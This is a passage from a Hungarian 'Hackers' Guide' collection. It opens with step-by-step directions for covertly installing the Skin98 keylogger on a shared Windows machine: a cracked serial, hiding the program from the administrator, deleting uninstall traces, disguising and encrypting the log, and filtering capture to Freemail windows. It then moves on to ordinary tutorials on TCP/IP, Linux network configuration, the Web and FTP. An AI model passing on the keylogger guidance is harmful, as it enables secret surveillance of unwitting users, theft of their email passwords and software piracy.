lenne: Phrozen Crew 98 s/n: D6E9CC1D). Ha ez sikerült akkor installáljuk a programot. Az installálásnál ügyeljünk arra, hogy ne külön könyvtárba kerüljön, hanem direkt a Windows könyvtárba. Hogy miért? Mert ugye nem akarjuk a rendszergazda munkáját megkönyebbíteni :-). Sajnos a program a
107
Hackers’ Guide
Vezérlőpult/Programok hozzáadása menüben a Programok eltávolításához felrakta magát, tehát ha valaki mondjuk a dugig lévő gépről akar törölgetni, akkor száz, hogy evvel kezdi... A profibbak kiszedhetik a regisztrációs adatbázisból a lamerek inkább egyszerűen csak töröljék az UNINST.EXE-t meg az UNINST.LOG-ot... 3. Az első lépésektől a totális hatalomig... Tehát sikerült az árulkodó jeleket eltakarítanunk. Két fontos fájlra hívnám fel a figyelmet. Az első az enlog.exe... Ennek segítségével fejthetjük vissza a log fájlt. A másik a skin98.exe, ez a keylogger. Indítsuk be a programot. Ekkor megjelenik egy ablak amiben hat kis fülecskét találunk. - Intercepts Intercept key pushes - Minden leütés mentése Intercept key pops - Kis és nagybetük mentése megkülönböztetve Intercept all printed symbols (a-z, 0-9,etc.) - Minden nyomtatott karakter mentése Intercept all system keys (Alt, etc.) - Minden rendszerbillentyű mentése (Alt, Tab stb.) Intercept all mouse clicks - Minden egérkattintás mentése Log file name - Itt a logfájlnév nevét kell megadnunk, mondjuk a Win könyvtárban egy sysinfo.dll-t :-) értelemszerűen - Logs Add Begin/END marks - A számítógép indítása/Kikapcsolása(vagy újraindítása) -nak rögzítése Add date to BEGIN/END marks - A számítógép indítása/Kikapcsolása(vagy újraindítása) dátumának rögzítése Add time to BEGIN/END marks - A számítógép indítása/Kikapcsolása(vagy újraindítása) idejének rögzítése Save window caption - Az ablak nevének elmentése Add task name to window caption - Az alkalmazás nevének elmentése Save text from window - Szöveg mentése az ablakban Save edit lines from window - Elmenti az "edit line"-ban (nem tudok most rá magyar megfelelőt) lévő szöveget Encrypt LOG file - Ennek segítségével felismerhetetlenné válik a log fájl egyszerű F3-ra Save Pastes from clipboard - A vágópadra másolt dolgokat elmenti Password for encrypting - A szükséges kód ahhoz, hogy újra felismerhető legyen a log... Edit lines to save - Hány sor után mentse a keylogger a dolgokat... - Change password Ezt gondolom nemkell bővebben elmagyaráznom... Kód beállítása azért, hogy ne nagyon tudja más elindítani a Skin'98 configuráló részét... - Scheduling Itt beállíthatjuk, hogy melyik nap hány órától hány óráig figyelje a gépet... - Filters Szürök... Megszűrhetjük, hogy mit logoljon a progi. Ha az Enable filters kivan pipálva akkor működik a szűrés... Program neve szerint (Task fiter mask) és az ablakok neve szerint(Window capture filter mask) szűrhetünk értelemszerűen. Mondjuk ha csak Freemail-re specializálódunk akkor *freemail* a Window capture filter maskban!
108
Hackers’ Guide
Ennyi lenne, ami most hirtelen vasárnap a kollégiumba való visszaindulás előtt egy órával megtudtam fogalmazni ezekről a hasznos programokról. Ha bármi kérdés felmerülne, akkor ne kiméljél a leveleiddel!
************************************************************************************************
Mi az IP, TCP/IP Néhány év(tized)-del ezelőtt az USA-ban megkezdődött a kutatói/katonai hálózat kialakulása az ún. ARPANET. Ez kezdetben néhány egyetemből és katonai intézményből épült fel és elsősorban kutatási célokat szolgált. A hálózathoz egyre több egyetem kapcsolódott, folyamatosan gyarapodott, és így alakult ki a ma már egyre jobban ismert Internet. Mivel az internet az ARPANET-ben gyökerezik, ezért logikus, hogy sokmindent át is vett onnan, például a az alapprotokollját a TCP/IP-t. Kezdjük először is a név magyarázatával. A TCP/IP, helyesebben írva IP/TCP, általában egy teljes protokollcsaládot jelent, ami magában foglalja az összes IP-re (Internet Protocol) épülő protokollt. A TCP (Transmission Control Protocol) ennek a családnak egy tagja (tegyük hozzá, hogy ezt használjuk leggyakrabban), de emelett rengeteg "testvére" van, mint például az UDP (User Datagram Protocol) vagy az ICMP (Internet Control Message Protocol). Az internet rendkívül heterogén hálózatokat fogott össze, ezért elsődleges cél volt az IP számára, hogy a fizikai médiumtól függetlenül, bárhol képes legyen működni. Ehhez egy olyan absztrakciós rétegre van szükseg, ami minden eszközön megvalósítható, és semmilyen eszközhöz nem köthető. Az IP-ben használható eszközöknek a következő követelményeknek kell megfelelniük: •
képes legyen egy meghatározott mennyiségű byte-ot egyszerre átvinni (ezt hívjuk datagrammoknak, vagy csomagoknak)
•
képes legyen az eszköz alacsonyszintű (fizikai címét) leképezni egy logikai IP - címre
Mint láthatjuk a fenti két megkötést szinte minden lehetséges fizikai eszközön meg lehet valósítani, kezdve az ARCNet, Ethernet hálózatoktól az egyszerű nullmodemig. Az IP (=internet protokoll) állapotmentes protokoll, nem garantálja a packetek megérkezését a célhoz, sőt azt sem, hogy a packetek ugyanolyan sorrendben érkeznek meg, mint ahogyan elküldték őket. Ez tulajdonképpen annyit jelent, hogy a fizikai médium megpróbál megtenni a csomag célbajuttatása érdekében, de nem garantál semmit.
109
Hackers’ Guide
Egy IP csomag két részből áll: 1) fejléc információk, amelyek tartalmazzák a forrás és célcímet, valamint 2) adatrész, ami alkalmazás-specifikus. Az IP-re épülő protokoll az IP adatrészét használhatja felsőbb szintű fejléc, valamint adat számára. Így egymásba skatulyázhatók a csomagok, a felsőbb szintű protokollok használhatják azt, amit az alsó szintű add, de kiegészíthetik további tulajdonságokkal. Így jön a képbe a TCP. Mint láthatjuk az IP használata elég nehézkes az alkalmazások szempontjából, hiszen gondoskodniuk kell a csomagok sorbaállításáról, és az elvesző packetek újraküldéséről. Hogy ne kelljen minden alkalmazásban ezeket a funkciókat implementálni, ezért létrehozták a TCP protokollt, ami gondoskodik a csomagok sorrendbe allításáról, valamint az esetlegesen elvesző packetek ujraküldéséről. A TCP így már egy garantált csatornát biztosít a programunknak, hiszen gondoskodik arról, hogy ami a kapcsolat egyik végén "bement", az a másik végén ki is jön. Láthatjuk, hogy a TCP protokoll sokkal kényelmesebb az alkalmazások szempontjából, ezért majdnem minden magas szintű protokoll ezt használja (telnet, ftp stb). Ugyanakkor nem mindig van szükség a TCP-vel járó szolgáltatásokra, ezért kialakult más IP-re épült, de úgyanúgy nem kapcsolatjellegű protokoll. Erre jellemzően a kérdés-válasz jellegű kommunikációnál lehet szükség, amikor a visszaigazolást tulajdonképpen a válasz maga jelenti. Ilyen protokoll az UDP. Ezt a protokollt használja például a DNS (domain name service), vagy az NFS (network file system). Ezen kívül még léteznek más, IP-re épülő protokollok, ilyen az ICMP (=internet control message protocol), vagy az IGMP (=internet group multicast protocol). 2. Címzés 2.1. Host címek Mint korábban írtam az IP azonos felületet igyekszik adni minden hálózati eszköz felé. Ebben nagy szerepet játszik a címzés felépítése, ami minden fizikai médián logikai cím, és a logikai-fizikai cím közti összerendelést a protokoll végzi el. Megjegyzendő, hogy az IP cím és a hálózati eszköz fizikai címe között nincs összefüggés. Az IP cím egy 32 bites szám, ami 4 byte-nak felel meg. Írási formája a következő: 192.168.2.1 Ahol két pont között egy byte-nak megfelelő tízes számrendszerbeli szám van. Ez a cím az egész interneten (ill. az intraneten, hogy ha a nagy háló nem elérhető) egyedi. Minden hálózati eszköznek saját címe van, tehát ha egy számítógépben több hálózati eszköz van (több ethernet kártya pl) , akkor az a gép több címen is elérhető. A címen kívül a célgépen meg kell neveznünk egy szolgáltatást amit el kívánunk érni. Erre az ún. portcím szolgál, ami egy 16 bites szám. A portcímek egy része előre meghatározott szolgáltatásoknak van lefoglalva, például a 23-as port a telnet, 21-es az ftp, 25-ös pedig a levelezés számára foglalt. 2.2. Network címek és a netmask A hálózaton nem csak a host-okat (számítógépeket, munkaállomásokat) azonosítják IP címmel, hanem a hálózatokat is. Egy IP szegmenst a network címe azonosít. Egy host neve úgy áll össze, hogy a cím elején levő bitek határozzák meg a hálózat
110
Hackers’ Guide
címét, a fennmaradó bitek pedig a host-ot azonosítják a hálózaton belül. Az, hogy melyik rész a network cím, és melyik azonosítja a host-ot a netmask határozza meg. A címnek azon bitjei, amiken a netmask bitjei 1-et tartalmaznak, a network címet határozzák meg, a fennmaradó bitek pedig a network-ön belüli hostcímet adják meg. Legyen a cím: |1. byte |2. byte |3. byte |4. byte | +---------------------------------------------------------------+ |1|1|0|0|0|0|0|0|1|0|1|0|1|0|0|0|0|0|0|0|0|0|1|0|0|0|0|0|0|0|0|1| = 192.168.2.1 +---------------------------------------------------------------+ És a netmask: +---------------------------------------------------------------+ |1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|1|0|0|0|0|0|0|0|0| = 255.255.255.0 +---------------------------------------------------------------+ Tehát, ha a címünk 192.168.2.1, és a netmask 255.255.255.0, akkor a 192.168.2.0 a hálózati cím, a 192.168.2.1-nek az utolsó byteja (tehát az 1) pedig a host cím. Ebben az IP szegmensben 256 különböző cím szerepelhet, mégpedig 192.168.2.0 192.168.2.255-ig. Ebből két címet fenntart magának a protokoll, mégpedig a 192.168.2.0, ez a network cím, és a 192.168.2.255 ez pedig a broadcast cím, erről bővebben egy picit később. Ha tehát a 192.168.2.3-as címet akarjuk megcímezni, akkor a netmaskunkból látszik, hogy ez egy lokális cím, tehát közvetlenül címezhető. Ha viszont a 192.168.1.1-es címet szeretnénk elérni, a netmaskból látszik, hogy ez nem helyi cím, lokálisan nem kézbesíthető, ehhez a gateway-t (útválasztó) használjuk fel. Mi neki adjuk át a datagrammokat, a többiről pedig ő saját belső táblázataira támaszkodva gondoskodik. A netmask egy elég jó eszköz hálózatok feldarabolására, hiszen a használatával egy eredetileg 256 IP címes hálózatot fel lehet darabolni 16 db. 16 címesre, vagy 4 db. 64 címesre, de akár 1 128 címesre + 2 db. 64 címesre. Ezt a technikát hívják subnetelésnek. 2.3. Címosztályok Most, hogy már ismerjük a netmask fogalmát, könnyű lesz megértenünk az A, B és C címosztályokat. Az A osztályú cím az 1.0.0.0 - 126.255.255.255 címeket foglalja magába és netmaszkja 255.0.0.0 tehát egy IP szegmensben 2^24 (=16 millió) hostot képes megcímezni. A B osztályú címek 128.0.0.0 - 191.255.255.255 terjednek, és netmaskjuk 255.255.0.0 (2^16 = 65536 host). A C osztályú címek a 192.0.0.0 223.255.255.255 címtartományban vannak, és netmaskjuk 255.255.255.0. A fennmaradó címtartomány foglalt későbbi fejlesztésekre. Ezeket a címtartományokat nem kell feltétlenül így használnunk, hiszen egy 15.1.2.3 címet is használhatunk 255.255.255.0 netmaskal, és olyankor csak 256 helyi host létezik. Régen az útválasztók nem ismerték a netmask fogalmát, és csak címosztályok alapján tudtak routeolni. Ma a címosztály nem több adminisztrációs fogalomnál, illetve az egyes segédprogramok a címosztály alapján választanak alapértelmezést, de ezt bármikor átállíthatjuk. 2.4. Localnet
111
Hackers’ Guide
Mint láthatjuk a fenti címfelosztásból kimaradt a 127.0.0.0/255.0.0.0 címtartomány. Ez az ún loopback-nek fenntartott rész. A loopback egy olyan áleszköz, ami a saját számítógépünket jelenti. Bármelyik cím a 127.0.0.0 tartományon belül a saját számítógépünkkel kommunikál. 2.5. Broadcast cím Ezzel nem kell nagyon foglalkoznunk, a lényege az, hogy ezzel a címmel az összes helyi gépet megcímezhetjük, ún. körüzenetet küldhetünk ide, és azt az összes állomás venni fogja. A broadcast címnek foglalt az adott networkon megcímezhető legnagyobb hostcím. Tehát a címben a host részen csupa 1-es szerepel. Így a fenti 192.168.2.0/255.255.255.0 tartományban a broadcast számára a foglalt a 192.168.2.255 cím. 2.6. Routolás Most már ismerünk IP címeket, netmaskokat, dehát hogyan is áll össze az egész hálózat? Erre próbálok rávilágítani ebben a fejezetben: Mint már mondtam, ha egy datagramm lokálisan nem kézbesíthető (tehát logikailag vagy fizikailag más közegben helyezkedik el), akkor az útválasztónak (gateway-nek) továbbítjuk ezt a packetet. Az útválasztónak kell eldöntenie, hogy egy adott packetnek merre kell tovább mennie. Ebben a feladatban rendelkezésre áll a cél IP cím, ill. egy belső táblázat az ún. routing tábla. (mint később láthatjuk sajat gépünkön is van ilyen tábla, de legtöbbször nem használjuk, csak a lokális háló számára van bejegyzés) Szóval a címek leírásánál már mondtam, hogy minden egyes hálózati eszköz kap egy IP címet, tehát ha a routerünknek két interface-e van, akkor neki két IP hálózatra van kijárása, számára két szegmensen is vannak közvetlenül elérhető hostok. Legyen most két IP szegmensünk, az egyik 192.168.1.xxx/255.255.255.0 (eth0 eszközön keresztül), a másik pedig a 192.168.2.xxx/255.255.255.0 (az eth1 eszközön keresztül). Így a routing tábla valahogy így nezne ki: Célcím 192.168.1.0 192.168.2.0
Netmask Gateway 255.255.255.0 255.255.255.0 -
Eszköz eth0 eth1
Így a routerünk meg tudja címezni mindkét IP szegmenst valamelyik eszközén keresztül. A megfelelő eszköz keresése valahogy úgy zajlik, hogy az első olyan routing bejegyzés eszköz mezője hivatkozik a keresett eszközre, aminek a tartományába a célcím beleesik. Van egy harmadik oszlop, ami a fenti két bejegyzésnél üres. Ezt az oszlopot használhatjuk fel annak megjelölésére, hogy a célcím nem lokálisan elérhető, de az adott szegmensen található gateway már tudja az utat a cél felé. Ilyen módon a gateway-ek összeláncolhatók. Vegyünk tehát fel egy olyan routing bejegyzést, amin keresztül az egesz internetet láthatjuk. Legyen ez mondjuk egy soros vonal (ppp0), a soros vonalon keresztül látunk egy gateway-t, ami az internet felé továbbítja a packeteket. Célcím 0.0.0.0
112
Netmask 0.0.0.0
Gateway 195.184.3.2
Eszköz ppp0
Hackers’ Guide
Láthatjuk, hogy a netmask 0.0.0.0 tehát a teljes címtartományt lefedjük, azt is láthatjuk, hogy ezeket a kéréseket a ppp0-s eszközön kell továbbitani, ott pedig egy gateway-nek kell adnunk, akinek a címe 195.184.3.2. Ilyen módon épül fel az egész internet, minden kis helyi hálózat továbbitja a nem helyi packeteit egy olyannak, aki már tudja merre kell azt továbbítani. 3. Linux Eddig általánosságban beszéltem a TCP/IP felépítéséről most szeretnék egy kicsit a Linux oldaláról közelíteni a témához. 3.1. Interface-k Az interface-k tulajdonképpen a hálózati eszközöknek felelnek meg. Minden hálózati eszközt az ifconfig nevű programmal tudunk beállitani. Az általános szintaxis a következő: ifconfig <eszköz> netmask broadcast Ezek a legfontosabb paraméterek, bővebben lásd: man ifconfig. Az eszközök neve változó, főleg a típustól függ, általában:
eth[0123456789] ppp[0123456789] sl[0123456789] lo
ethernet kártyák ppp eszközök (soros vonali, pointopoint) slip eszközök (soros vonal) loopback eszköz
Mielőtt ezeket az eszközöket használni tudnánk, a kernelbe be kell forditani a megfelelő drivereket. Ha az ifconfig-ot paraméterek nélkül hívjuk meg, akkor kiírja az aktuálisan felkonfigurált eszközök listáját: balabit:~$ ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0 UP BROADCAST LOOPBACK RUNNING MTU:3584 Metric:1 RX packets:97 errors:0 dropped:0 overruns:0 frame:0 TX packets:97 errors:0 dropped:0 overruns:0 carrier:0 coll:0 eth0
Link encap:Ethernet HWaddr 00:40:F6:58:A0:B3 inet addr:193.6.40.37 Bcast:193.6.40.255 Mask:255.255.255.0 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10936 errors:0 dropped:0 overruns:0 frame:974 TX packets:3449 errors:0 dropped:0 overruns:0 carrier:0 coll:574 Interrupt:10 Base address:0x300
Ez megadja a beállítható paraméterek aktuális értékét, valamint néminemű statisztikai adatokkal szolgál. 3.2. Routing tábla
113
Hackers’ Guide
A 2.5. fejezetben leírtak mint mondtam nem csak a gateway-ekre igaz, hiszen Linux alatt is kreálhatunk magunknak ilyen routing táblát, sőt egy Linux képes tökéletesen ellátni a router feladatait. A route tábla beállítását és lekérdezését a route parancs segítségével tudjuk megejteni. Indítsuk el paraméterek nélkül a route parancsot: balabit:~$ route Kernel IP routing table Destination Gateway 193.6.40.0 * 127.0.0.0 * default rxkk.saturnus.v
Genmask Flags Metric Ref 255.255.255.0 U 0 0 255.0.0.0 U 0 0 0.0.0.0 UG 0 0
Use Iface 6 eth0 2 lo 88 eth0
Mit is jelent, amit látunk: Az eth0 eszközön keresztül látjuk a lokális hálózatot, ami a 193.6.40.0/255.255.255.0 tartománynak felel meg. (ez az első sor) A 127.0.0.0/255.0.0.0 -n saját magunkat látjuk, ez a loopback. Az összes többi packet pedig, ami nem fér be a fenti két kategóriába a default-on megy keresztül, ami egy gateway-nek továbbít minden packetet. Új bejegyzéseket is vehetünk fel a route paranccsal. A szintaxis körülbelül a következő: route <-host|-net> netmask dev <eszköz> 3.3. Hálózati mintabeállítások Ebben a fejezetben konkrét példákat nézünk át, hogy adott konfigurációban hogyan kell beállítanunk a hálózatot a fenti ifconfig és route parancsok segítségével. Később a disztribúció specifikus beállításokat nézzük át, az újabb disztribúciók ugyanis sokkal egyszerűbbé teszik ezeket a beállításokat, és már kész scripteket adnak, amiket megfelelően felparaméterezve ugyanoda juthatunk, mint ha külön-külön kiadnánk a lenti parancsokat. 3.3.1. Linux ethernet hálózaton Példa: A számítógépben egyetlen ethernet kártya van, és ezen keresztül éri el az internetet, és a lokális gépeket egyaránt. A helyi hálózat egy C osztályú IP szegmensen van. Megoldás: A gép IP címe a példa kedvéért legyen 192.168.2.1, a gateway legyen 192.168.2.254. Ekkor a következő parancsokkal lehet beállítani a hálózatot: $ ifconfig eth0 192.168.2.1 netmask 255.255.255.0 broadcast 192.168.2.255 network 192.168.2.0 Ez beállítja az eth0 eszköz IP címét, a rajta keresztül elérhető hálózat maszkját, a körüzenet címét, és a hálózati címet. $ route add -net 192.168.2.0 Ez beállítja a helyi hálózat route bejegyzését, így ezentúl a 192.168.2.xxx című hostokat el tudjuk érni.
114
Hackers’ Guide
$ route add default gw 192.168.2.254 Ez pedig a lényeg: minden olyan csomag, amiről eddig nem rendelkeztünk, menjen a 192.168.2.254-en levő útválasztóra. 3.3.2. Linux modemes dialup-al Ma még - sajnos - nem jellemző az, hogy egy számítógép folyamatos kapcsolattal rendelkezzen a külvilág felé. Általános kapcsolódási módszer a telefonos hálózaton történő kapcsolódás. Ehhez legalább kétféle protokoll áll rendelkezésünkre: •
SLIP (= Serial Line Internet Protocol)
•
PPP (= Point to Point Protocol)
Az első egy egyszerű, de meglehetősen elavult protokoll, ma már egyre kevésbé használják, és sokkal inkább a második hódit tért. A PPP nem csak IP-t tud átvinni, hanem például IPX-et is, támogatja az azonosítást, és sokkal jobban definiált. A kapcsolat felvétel két fő lépésből áll: 1. A modem-számítógép kommunikációja, tárcsázás, kapcsolatfelvétel 2. Amennyiben a kapcsolat létrejött, az adatcsatorna átalakítása bináris kommunikációra, csomagok forgalmazása A számítógép a modemeket szöveges parancsokkal vezérli (ezek a Hayes féle modemvezérlő parancsok). Ha az adatkapcsolat létrejött, akkor kapunk egy terminált, amin egy login prompt utan az azonosítónkat, és a jelszavunkat begépelve shell-hez juthatunk a távoli gépen. Amennyiben azonban adatot szeretnénk forgalmazni, ahhoz a távoli kiszolgálógépen és a saját számítógépünkön is el kell indítanunk az adatkapcsolatot levezénylő programot. (ez PPP esetében a pppd). Például itt egy bejelentkezés modemen keresztül: ATZ OK ATDT501060 CONNECT
<-- inicializálja a modemet <-- modem válaszol, inicializálás kész <-- számítógép küldi a tárcsázási parancsot <-- modem küldi, jelzi, hogy az adatkapcsolat létrejött. Ezentúl a kommunikáció a távoli géppel történik, a modem már csak továbbítja az adatokat Welcome to Altair! <-- ezt a túloldali gép login programja üzeni login: bazsi <-- itt a mi oldalunk beírja a felhasznalói nevet, amint a login: megjelenik password: xxxxx <-- a password: feliratra reagálva a számítógép beüti a kódot You have new mail. altair:~$ pppd <-- sikerült belépnem a gépre, most el kell indítani a pppd-t Ezen a ponton a túloldal várakozik, hogy a mi oldalunkon is elinduljon a pppd. Ezután már indulhat is az adatkommunikáció. Mint láthatjuk a fenti bejelentkezés egyszerűen leírható kérdés-válaszok segítségével:
115
Hackers’ Guide
Vár OK login: password: altair:~$
Válasz ATZ ATDT501060 bazsi xxxxx pppd
Ezt a kérdés-válasz kommunikációt hívják chat-nek, és a leírását pedig chatscriptnek. A chat-script segítségével a teljes belépési folyamat automatizálható. A modemes dialup beállításához tehát létre kell hoznunk egy chat scriptet, amit megadva a pppd-nek felépíthető a kapcsolat. Ehhez a következő paraméterekkel kell indítanunk a pppd-t: balabit:~$ pppd /dev/modem modem lock connect /etc/ppp/chatscript defaultroute Nézzük a paraméterek jelentését: •
/dev/modem: a modemünket jelképező eszköz. Ez általában egy symlink valamelyik soros portra (/dev/ttySxx)
•
modem: azt mondja meg a pppd-nek, hogy a modem vezérlő vonalakat be kell állítani (DTR, stb)
•
lock: azt jelenti, hogy a modemet lockolni kell (UUCP stílusú lock)
•
connect /etc/ppp/chatscript: ezzel adjuk meg a chat script nevét. Erről a scriptről bővebben később.
•
defaultroute: azt jelenti, hogy a pppd által felállított adatcsatorna legyen a default route bejegyzés, azaz minden csomag erre menjen kifelé.
A fennt megadandó chat script standard inputjára és outputjára a modem kerül, tehát minden amit kiírunk azt megkapja a modem, és a modem által küldött adatokat olvashatjuk be. A chat scriptet a chat nevű programmal tudjuk "lejátszani". Tehát az "/etc/ppp/chatscript" nevű állományba a következőket kell írnunk: #!/bin/sh chat `` `ATZ` `OK` `ATDT501060` `login:` `bazsi` `password:` `xxxx` `altair:~$` `pppd` Így elértük célunkat, a kapcsolatfelvételt automatizáltuk. 3.3.3. Hálózati eszközök beállítása RedHat alatt Redhat alatt nagyon jól megoldották az interface-k beállításást. Egyrészt mindent megtehetünk X-Window alól, a control-panel segítségével, másrészt a control-panel által generált állományokat is kitölthetjük az /etc/sysconfig/network-scripts alatt könyvtárban. Egy hálózati eszközhöz tartozó beállítások az ifcfg-eszknév nevű állományokban találhatók a fent megnevezett könyvtárban, tehát az eth0 eszköz adatai az /etc/sysconfig/network-scripts/ifcfg-eth0 állományban található. Minden ilyen állomány egy shell script, aminek a feladata néhány változónak a beállítása, ezért általában így néz ki: DEVICE=eth0 IPADDR=195.184.3.121
116
Hackers’ Guide
NETMASK=255.255.255.0 NETWORK=195.184.3.0 BROADCAST=195.184.3.255 ONBOOT=yes BOOTPROTO=none Általában a konkrét eszköz típusától függően további paramétereket is beállíthatunk, de a fentieket mindenhol értelmezik. Egy soros porthoz két állomány is tartozik az egyik az ifcfg-ppp0, a másik pedig az ehhez tartozó chat script (chat-ppp0). Egy soros porthoz tartozó ifcfg-ppp0 például így néz ki: PERSIST=no DEFROUTE=yes ONBOOT=no INITSTRING=ATZ MODEMPORT=/dev/modem LINESPEED=115200 ESCAPECHARS=no DEFABORT=yes HARDFLOWCTL=yes DEVICE=ppp0 PPPOPTIONS= DEBUG=no PAPNAME=bazsi REMIP=195.184.3.117 IPADDR=195.184.3.121 BOOTPROTO=none MTU=1500 MRU=1500 DISCONNECTTIMEOUT= RETRYTIMEOUT= USERCTL=yes Az egyes paraméterek jelentése értelemszerű, ezeknek a fileoknak a beállítását érdemesebb control-panellel végeznünk, az kitölti az összes mezőt a számunkra. 3.3.4. Hálózati eszközök beállítása Debian alatt ... 3.3.5. Hálózati eszközök beállítása SuSe alatt ... 3.4. Nameserver beállítása A nevek IP címmé, valamint az IP címek nevekké fordítása az ún. DNS (domain name service) feladata. A DNS szerver-t általában a szolgáltatónk üzemelteti, és ő adja meg a szerver adatait is. (IP cím) Ezeket az adatokat az /etc/resolv.conf nevű fileban lehet megadni, ahol a következő kulcsszavak értelmezettek:
117
Hackers’ Guide
nameserver search domain1 domain2
A DNS IP címét adja meg.Többet is felsorolhatunk space-el elválasztva. Keresési zónákat adhatunk meg, amennyiben egy host a domain1 v. domain2 zónában van, akkor elég a zónán belüli nevét használnunk. (pl: proba.domain1 helyett elég proba-t írni)
3.5. Nameserver nélküli beállítás Amennyiben a hálózatunkon nincsen nameserver, például nincs kapcsolatunk az internettel, akkor is szükségünk lehet név -> IP cím feloldásra. Ekkor alternatív megoldásként használhatjuk az /etc/hosts állományt. Ennek a formátuma: IP cím név/nevek 127.0.0.1 localhost 192.168.2.1 proba.domain.nev
proba
Ekkor a "proba.domain.nev" és a "proba" mindkettő a 192.168.2.1-es címhez lesz hozzárendelve.
4. Szerzői jogok, és garancia Az ilyen dolgokat mindig is utáltam, de valamennyire szükség van rá. Szóval a dokumentum tartalmát illetően semmiféle garanciát nem vállalok, az itt levő bármelyik parancs begépelése földrengéseket, tűzvészeket okozhat, és akár megformázhatja a vinyódat (bár ilyen még soha nem történt), de erről én egyáltalán nem tehetek. Ha ezt nem hiszed el, akkor sajnos le kell tegyél e dokumentum bármilyen formában történő felhasználásáról. Copyright (c) 1998, Balázs Scheidler. A szerzői jogok engem, Scheidler Balázst, illetnek, és ezt az irományt 1998-ban követtem el, úgyhogy még legalább 70(*) évig az enyémek is maradnak. Minden jog engem illet, de kegyesen adok néhány jogot nektek is: tehát a dokumentumot elektronikus módon szabadon terjesztheted, amíg a fenti copyright sor a helyén marad. Egyéb terjesztésről egyénileg beszélhetünk. Amennyiben tanulsz valamit ebből a dokumentumból, és hasznodra válik, lógsz egy sörrel, amit egyszer majd BEHAJTOK. :-) Ja még annyit akartam írni, hogy megtalálsz a [email protected] e-mail címen, kritikát, bővítéseket, flame-t oda küldhetsz. * eredetileg itt 50 év állt, de Balogh Zsolt felvilagosított, hogy a szerzôi jogok az embert 70 évig illetik meg.
************************************************************************************************
118
Hackers’ Guide
A WORLD WIDE WEB A World Wide Web (WWW vagy Web) a kliens/szerver modell alapján mûködik. Amikor tehát a Web-et használjuk, akkor tulajdonképpen két programot veszünk igénybe: a klienst és a szervert. A kliensprogram az, amelyik a lokális terminálunkon fut, ez a program jeleníti meg képernyõnkön az információkat, fogadja a billentyûleütéseket és az egérrel végrehajtott mûveleteket valamint visszakeresi az igényelt információt a szerveren. A szerverprogram abban a számítógépes rendszerben fut, amelyik a Web információt biztosítja. Várja a felhasználók igényeit és a kliensek számára az információkat biztosítja. A legtöbb esetben a felhasználónak csak az egyenlet második felével kell törõdnie, vagyis azzal, hogy miként mûködik a kliensprogram. Ugyanis ez az a program, amelyet használ, amellyel dolgozik és az a rész amelyet a szerver végez, láthatatlan számára. A Webbel kapcsolatos feladatok végrehajtása során a háttérben valószínûleg több különbözõ szerver fogja az igényeinket kezelni. A háttérben folyó mûveletek megemlítésének kizárólag csak az az oka, hogy ha valamelyik irat váratlanul hozzáférhetetlenné válik, akkor megértsük, hogy ennek az az oka, hogy egy olyan szerverrel próbáltuk meg fölvenni a kapcsolatot amelyik éppen nem üzemel. A Web sokféle információt kezel, amelyek általában a Hypertext Mark-up Language formátummal rendelkeznek. Ez a formátum azt jelenti, hogy a formázásra és a csatolásra vonatkozó kódok a szövegen belül helyezkednek el. A megfelelõ kliensprogram használatával az adott platform minden elõnye kihasználható. A Weben a hypertext-szolgáltatásokon kívül szinte minden Internet eszköz elérhetõ (FTP, Gopher, WAIS,Hírcsoport, Telnet). Talán a legelsõ web-lap volt a legegyszerûbb, ahol szinte csak szöveg volt, esetleg egy-egy kép a szöveg alátámasztására.A szövegben egy-két aláhúzott kék színû szóra lehetett rákattintani, amellyel átugorhattunk egy másik témára, vagy helyre, ami az adott szóhoz kötõdött. Ilyen lapokat ma már egyre kevesebbet találunk, ill. csak külön kérésre jelennek meg, ha keresõnkben beállítjuk, hogy csak a szöveget töltse le. A csak szöveges lapok beolvasása sokal gyorsabb. Egyre gyakoribbak azonban azok a lapok ahol a kapcsolati szó nem egy aláhúzott szó, hanem egy kép. Az egérmutatót (pointer) a képernyõn mozgatva megnézhetjük, hogy hová lehet kattintani. Ilyenkor a pointer alakja megváltozik, innen ismerjük föl a hivatkozásokat, linkeket. Ilyenkor érdemes elolvasni, hogy mivan az állapotsorba írva, mert megtudhatjuk, hogy egy másik fájl kerül beolvasásra errõl a szerverrõl, vagy átlépünk a Föld egy másik pontján levõ gépre. Sok esetben a hivatkozások mögött E-mail címek rejtõznek, ezt szintén az állapotsorból olvashatjuk le. Ha ezekre kattintunk, akkor a saját levelezõprogramunk indul el, amelyikkel levelet tudunk írni a megadott címre. A címzett adott, nekünk csak a levél tárgyát és szövegét kell megírni. Ma már hangállományokat is letölthetünk a web segítségével (.wav, .mid, .mod, stb.) sõt lehetõség van videók megtekintésére is. A rádióhallgatás a Real Audio segítségével jöhet létre ami lehetõvé teszi - mint ez a nevébõl is kitûnik - a valós
119
Hackers’ Guide
idejû lejátszást. Ezt a programot ma már megkapjuk a böngészõnkkel együtt, de a rádióállomások web-lapján is találunk egy kapcsolatot amellyel eljuthatunk a beszerzés helyére és onnan letölthetjük a programot. A KERESÕGÉPEK Ma már több keresõ is létezik, melyek mind arra szolgálnak, hogy megkönnyítsék a dolgunkat az Internet ma még elég kaoisztikus világában. A legnépszerûbb keresõk a Yahoo, az Alta Vista, az Excite és a Hotbot. Az elsõ magyar keresõ pedig Heureka névre hallgat. Ezekben a keresõkben tulajdonképpen bármit kereshetünk, nincs olyan témakör vagy szó amire ne dobnának ki egy pár találatot. A keresés arra is jó, hogy ujabb web-helyeket fedezzünk föl, így az érdeklõdési körünket bõvíthetjük, mert az információ forrása gyakorlatilag korlátlan.
************************************************************************************************
File Transfer Protocoll (FTP)
Az FTP funkciója: file-ok másolása távoli és helyi gép között Szintaxis ftp [kapcsolók] [host] Kapcsolók -d Engedélyezi a debuggolást úgy, hogy bekapcsolja a `logging` jellemzot. -g kikapcsolja a metakarakter kiterjesztést a file-nevekben -i kikapcsolja az interaktív közlésmódot miközben több file-t másolunk. -n megakadályozza az autómatikus bejelentkezést a kezdeti kapcsolatteremtéskor. Egyébként az ftp megkeresi a $HOME/.netrc file-t, amely leírja a bejelentkezési- és az inicializációs processzeket a távoli host részére. -t felfüggeszti a csomagok nyomkövetését.
120
Hackers’ Guide
